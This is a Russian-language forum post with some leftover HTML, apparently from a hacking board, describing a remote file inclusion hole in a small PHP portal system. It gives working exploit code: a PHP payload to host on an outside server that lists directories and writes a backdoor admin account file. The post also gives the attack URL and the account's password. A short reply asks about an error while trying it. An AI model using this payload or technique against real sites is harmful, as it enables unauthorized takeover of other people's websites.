с сайта http://www.enuke.net/shad0wed/ (разработчики) можно скачать небольшую портал систему (на подобие phpnuke, но только намного приметивнее, не использует MySQL) мне довелось сталкнуться с одним сайтом, который был сделан с помощью этой горе-системы! =) весь прикол заключается в том что файл site.ru/modules/downloads/include.php содержит </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><?php require($mod_root."/w_vars.php"); ?>[/QUOTE]<span id='postcolor'> ну че!? намек понят? а вот какой скрипт я придумал для того чтобы найти папку с пользователями (users), а потом сразу создать пользователя в ней с привелегиями 100 - админ! </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><pre><?php if (isset($dir)) { $d = dir($dir); echo "Handle: " . $d->handle . "<br />\n"; echo "Path: " . realpath($d->path) . "<br />\n"; while (false !== ($entry = $d->read())) { echo $entry."<br />\n"; } $d->close(); if (isset($hack)) { $zz = '<' . '?php $username = "hacker"; $password = "81dc9bdb52d04dc20036dbd8313ed055"; $email = "[email protected]"; $website = ""; $occupation = ""; $interests = ""; $avatar = ""; $user_online = "0"; $signature = ""; $info = ""; $rank = 100; $login_time = -1; $remote_ip = ""; $messages = ""; if((strtolower($usr) == strtolower($username)) && ($pwd == $password)) { $u_rank = $rank; $online = 1; } ?' . '>'; $filename = $dir . '/hacker.php'; if (!$handle = fopen($filename, 'w')) exit; if (fwrite($handle, $zz) === FALSE) exit; fclose($handle); } } ?></pre>[/QUOTE]<span id='postcolor'>этот скрипт надо назвать w_vars.php, запихнуть к примеру на narod.ru и построить URL site.ru/modules/downloads/include.php?mod_root=http://xxx.narod.ru&hack=1&dir=../../users/ забыл сказать пароль будет 1234 (там в скриптике фигурирует его MD5 хеш) GL
ja poprobuval, no osnovne vikidvaet etot error: Warning: main(): stream does not support seeking in /home/virtual/site4/fst/var/www/html/modules/downloads/include.php on line 2 eto ozna4aet , 6to o6ibka ,izpravlena , ilji?
